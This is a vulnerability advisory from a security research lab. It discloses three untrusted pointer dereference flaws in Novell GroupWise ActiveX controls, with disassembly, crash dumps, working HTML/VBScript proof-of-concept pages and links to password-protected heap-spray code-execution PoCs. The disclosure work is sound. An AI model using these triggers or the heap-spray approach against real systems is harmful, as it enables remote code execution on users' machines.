High-Tech Bridge Security Research Lab discovered multiple untrusted pointer dereference vulnerabilities in Novell GroupWise, which could be exploited to compromise a remote system.
1) Untrusted Pointer Dereference in Novell GroupWise: CVE-2013-0804

1.1 The vulnerability exists due to an untrusted pointer dereference error in the InvokeContact() method of the ActiveX control gwabdlg.dll (GUID {54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}, located by default at "C:\Program Files\Novell\GroupWise\gwabdlg.dll"). A remote attacker can pass an arbitrary value as the pInvokeParams argument of the InvokeContact() method and trigger an ACCESS_VIOLATION exception on a MOV EAX, DWORD PTR [EAX+4] instruction. Since a custom pointer can be supplied, an attacker can exploit this vulnerability with the heap-spray technique.

At the point of the crash, the application loads the dword at the supplied pointer plus four bytes into the EAX register:

    5722D301  8B40 04            MOV EAX,DWORD PTR DS:[EAX+4]

This value is then stored on the stack:

    5722D304  8985 24FFFFFF      MOV DWORD PTR SS:[EBP-DC],EAX

The code continues and enters a switch-case construct:

    5722D30A  83BD 24FFFFFF 01   CMP DWORD PTR SS:[EBP-DC],1
    5722D311  0F84 57010000      JE gwabdlg.5722D46E
    5722D317  83BD 24FFFFFF 02   CMP DWORD PTR SS:[EBP-DC],2
    5722D31E  0F84 00010000      JE gwabdlg.5722D424
    5722D324  83BD 24FFFFFF 03   CMP DWORD PTR SS:[EBP-DC],3
    5722D32B  0F84 83010000      JE gwabdlg.5722D4B4
    5722D331  83BD 24FFFFFF 04   CMP DWORD PTR SS:[EBP-DC],4
    5722D338  0F84 AF020000      JE gwabdlg.5722D5ED
    5722D33E  83BD 24FFFFFF 05   CMP DWORD PTR SS:[EBP-DC],5
    5722D345  0F84 9A030000      JE gwabdlg.5722D6E5
    5722D34B  83BD 24FFFFFF 06   CMP DWORD PTR SS:[EBP-DC],6

If an attacker can specify a custom switch value, in this case the number 3, execution jumps to address 0x5722D4B4:

    5722D4B4  8B45 08            MOV EAX,DWORD PTR SS:[EBP+8]
    5722D4B7  8945 D4            MOV DWORD PTR SS:[EBP-2C],EAX
    5722D4BA  8365 D8 00         AND DWORD PTR SS:[EBP-28],0
    5722D4BE  8D45 D8            LEA EAX,DWORD PTR SS:[EBP-28]
    5722D4C1  50                 PUSH EAX
    5722D4C2  68 58122D57        PUSH gwabdlg.572D1258
    5722D4C7  8B45 D4            MOV EAX,DWORD PTR SS:[EBP-2C]
    5722D4CA  8B40 30            MOV EAX,DWORD PTR DS:[EAX+30]
    5722D4CD  8B4D D4            MOV ECX,DWORD PTR SS:[EBP-2C]
    5722D4D0  8B49 30            MOV ECX,DWORD PTR DS:[ECX+30]
    5722D4D3  8B00               MOV EAX,DWORD PTR DS:[EAX]
    5722D4D5  51                 PUSH ECX
    5722D4D6  FF10               CALL DWORD PTR DS:[EAX]

After entering this function, and since the EAX register is completely under the attacker's control, it is possible to supply another custom pointer that will be called when the code reaches the CALL DWORD PTR DS:[EAX] instruction:

    0C0C0C0C  0C 0C              OR AL,0C
    0C0C0C0E  0C 0C              OR AL,0C
    0C0C0C10  0300               ADD EAX,DWORD PTR DS:[EAX]
    0C0C0C12  0000               ADD BYTE PTR DS:[EAX],AL
    0C0C0C14  0C 0C              OR AL,0C
    0C0C0C16  0C 0C              OR AL,0C
    0C0C0C18  0C 0C              OR AL,0C
    0C0C0C1A  0C 0C              OR AL,0C
Crash details:

    (162c.5ae0): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4
    eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Novell\GroupWise\gwabdlg.dll -
    gwabdlg!DllUnregisterServer+0x4c10e:
    5722d301 8b4004          mov     eax,dword ptr [eax+4] ds:0023:0c0c0c0c=????????
The following PoC will crash Internet Explorer 7/8/9:

    <html>
    <!-- (c)oded by High-Tech Bridge Security Research Lab -->
    <head>
    <title>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
    </head>
    <script language='vbscript'>
    Sub PoC()
        ' 202116104 = 0x0C0C0C08, so [EAX+4] reads the unmapped address 0x0C0C0C0C
        arg1=202116104
        target.InvokeContact arg1
    End Sub
    </script>
    <body>
    <h3>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
    <h4>Untrusted Pointer Dereference PoC</h4>
    <hr>
    This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR>
    <input language=VBScript onclick=PoC() type=button value="Proof of Concept">
    </body>
    <object classid='clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF' id='Target'></object>
    </html>
Code execution PoC: the following PoC code first sprays the heap with the 0x0C byte, a typical "no operation" sled for heap-spray exploitation. The 0xCC byte that follows (INT 3, trap to debugger) marks the beginning of the shellcode.

https://www.immuniweb.com/advisory/HTB23131_POC_1.zip
Archive's password: HTB23131_novell(gw)
1.2 The vulnerability exists due to an untrusted pointer dereference error in the GenerateSummaryPage() method of the ActiveX control gwabdlg.dll (GUID {54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}, located by default at "C:\Program Files\Novell\GroupWise\gwabdlg.dll"). A remote attacker can pass an arbitrary value as the pInvokeParams argument of the GenerateSummaryPage() method and trigger an ACCESS_VIOLATION exception on a MOV EAX, DWORD PTR [EAX+4] instruction. Since a custom pointer can be supplied, an attacker can exploit this vulnerability with the heap-spray technique.

At the point of the crash, the application loads the dword at the supplied pointer plus four bytes into the EAX register:

    5722D301  8B40 04            MOV EAX,DWORD PTR DS:[EAX+4]

This value is then stored on the stack:

    5722D304  8985 24FFFFFF      MOV DWORD PTR SS:[EBP-DC],EAX

The code continues and enters a switch-case construct:

    5722D30A  83BD 24FFFFFF 01   CMP DWORD PTR SS:[EBP-DC],1
    5722D311  0F84 57010000      JE gwabdlg.5722D46E
    5722D317  83BD 24FFFFFF 02   CMP DWORD PTR SS:[EBP-DC],2
    5722D31E  0F84 00010000      JE gwabdlg.5722D424
    5722D324  83BD 24FFFFFF 03   CMP DWORD PTR SS:[EBP-DC],3
    5722D32B  0F84 83010000      JE gwabdlg.5722D4B4
    5722D331  83BD 24FFFFFF 04   CMP DWORD PTR SS:[EBP-DC],4
    5722D338  0F84 AF020000      JE gwabdlg.5722D5ED
    5722D33E  83BD 24FFFFFF 05   CMP DWORD PTR SS:[EBP-DC],5
    5722D345  0F84 9A030000      JE gwabdlg.5722D6E5
    5722D34B  83BD 24FFFFFF 06   CMP DWORD PTR SS:[EBP-DC],6

If an attacker can specify a custom switch value, in this case the number 3, execution jumps to address 0x5722D4B4:

    5722D4B4  8B45 08            MOV EAX,DWORD PTR SS:[EBP+8]
    5722D4B7  8945 D4            MOV DWORD PTR SS:[EBP-2C],EAX
    5722D4BA  8365 D8 00         AND DWORD PTR SS:[EBP-28],0
    5722D4BE  8D45 D8            LEA EAX,DWORD PTR SS:[EBP-28]
    5722D4C1  50                 PUSH EAX
    5722D4C2  68 58122D57        PUSH gwabdlg.572D1258
    5722D4C7  8B45 D4            MOV EAX,DWORD PTR SS:[EBP-2C]
    5722D4CA  8B40 30            MOV EAX,DWORD PTR DS:[EAX+30]
    5722D4CD  8B4D D4            MOV ECX,DWORD PTR SS:[EBP-2C]
    5722D4D0  8B49 30            MOV ECX,DWORD PTR DS:[ECX+30]
    5722D4D3  8B00               MOV EAX,DWORD PTR DS:[EAX]
    5722D4D5  51                 PUSH ECX
    5722D4D6  FF10               CALL DWORD PTR DS:[EAX]

After entering this function, and since the EAX register is completely under the attacker's control, it is possible to supply another custom pointer that will be called when the code reaches the CALL DWORD PTR DS:[EAX] instruction:

    0C0C0C0C  0C 0C              OR AL,0C
    0C0C0C0E  0C 0C              OR AL,0C
    0C0C0C10  0300               ADD EAX,DWORD PTR DS:[EAX]
    0C0C0C12  0000               ADD BYTE PTR DS:[EAX],AL
    0C0C0C14  0C 0C              OR AL,0C
    0C0C0C16  0C 0C              OR AL,0C
    0C0C0C18  0C 0C              OR AL,0C
    0C0C0C1A  0C 0C              OR AL,0C
Crash details:

    (162c.5ae0): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4
    eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Novell\GroupWise\gwabdlg.dll -
    gwabdlg!DllUnregisterServer+0x4c10e:
    5722d301 8b4004          mov     eax,dword ptr [eax+4] ds:0023:0c0c0c0c=????????
The following PoC will crash Internet Explorer 7/8/9:

    <html>
    <!-- (c)oded by High-Tech Bridge Security Research Lab -->
    <head>
    <title>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
    </head>
    <script language='vbscript'>
    Sub PoC()
        ' 202116108 = 0x0C0C0C0C, the unmapped address the control dereferences
        arg1=202116108
        arg2="defaultV"
        arg3="defaultV"
        target.GenerateSummaryPage arg1 ,arg2 ,arg3
    End Sub
    </script>
    <body>
    <h3>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
    <h4>Untrusted Pointer Dereference PoC</h4>
    <hr>
    This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR>
    <input language=VBScript onclick=PoC() type=button value="Proof of Concept">
    </body>
    <object classid='clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF' id='Target'></object>
    </html>
Code execution PoC: the following PoC code first sprays the heap with the 0x0C byte, a typical "no operation" sled for heap-spray exploitation. The 0xCC byte that follows (INT 3, trap to debugger) marks the beginning of the shellcode.

https://www.immuniweb.com/advisory/HTB23131_POC_2.zip
Archive's password: HTB23131_novell(gw)
1.3 The vulnerability exists due to an untrusted pointer dereference error in the SecManageRecipientCertificates() method of the ActiveX control gwmim1.ocx (GUID {BFEC5A01-1EB1-11D1-BC96-00805FC1C85A}, located by default at "C:\Program Files\Novell\GroupWise\gwmim1.ocx"). A remote attacker can pass an arbitrary value as the lProp argument of the SecManageRecipientCertificates() method and trigger an ACCESS_VIOLATION exception on a MOV EDX,DWORD PTR DS:[ECX] instruction. Since a specially crafted pointer can be supplied, an attacker can abuse this flaw with the heap-spray technique.

At the point of the crash, the application loads the dword at the supplied pointer into the EDX register:

    10014805  MOV EDX,DWORD PTR DS:[ECX]

The same operation is then repeated, this time loading the untrusted pointer value into the EAX register:

    10014807  MOV EAX,DWORD PTR DS:[EDX]

Code execution is finally reached at address 0x10014809:

    10014809  CALL EAX
Crash details:

    (5c78.58f0): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=0275c46c ebx=00000000 ecx=0c0c0c0c edx=0000001b esi=0956de40 edi=00000000
    eip=10014805 esp=0275c45c ebp=0275c55c iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwmim1.ocx -
    gwmim1!DllUnregisterServer+0x8cb5:
    10014805 8b11            mov     edx,dword ptr [ecx]  ds:0023:0c0c0c0c=????????
The following PoC will crash Internet Explorer 7/8/9:

    <html>
    <!-- (c)oded by High-Tech Bridge Security Research Lab -->
    <head>
    <title>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</title>
    </head>
    <script language='vbscript'>
    Sub PoC()
        ' 202116108 = 0x0C0C0C0C, the unmapped address the control dereferences
        arg1=202116108
        target.SecManageRecipientCertificates arg1
    End Sub
    </script>
    <body>
    <h3>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586</h3>
    <h4>Untrusted Pointer Dereference PoC</h4>
    <hr>
    This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<BR><BR>
    <input language=VBScript onclick=PoC() type=button value="Proof of Concept">
    </body>
    <object classid='clsid:BFEC5A01-1EB1-11D1-BC96-00805FC1C85A' id='Target'></object>
    </html>
Code execution PoC: the following PoC code first sprays the heap with the 0x0C byte, a typical "no operation" sled for heap-spray exploitation. The 0xCC byte that follows (INT 3, trap to debugger) marks the beginning of the shellcode.

https://www.immuniweb.com/advisory/HTB23131_POC_3.zip
Archive's password: HTB23131_novell(gw)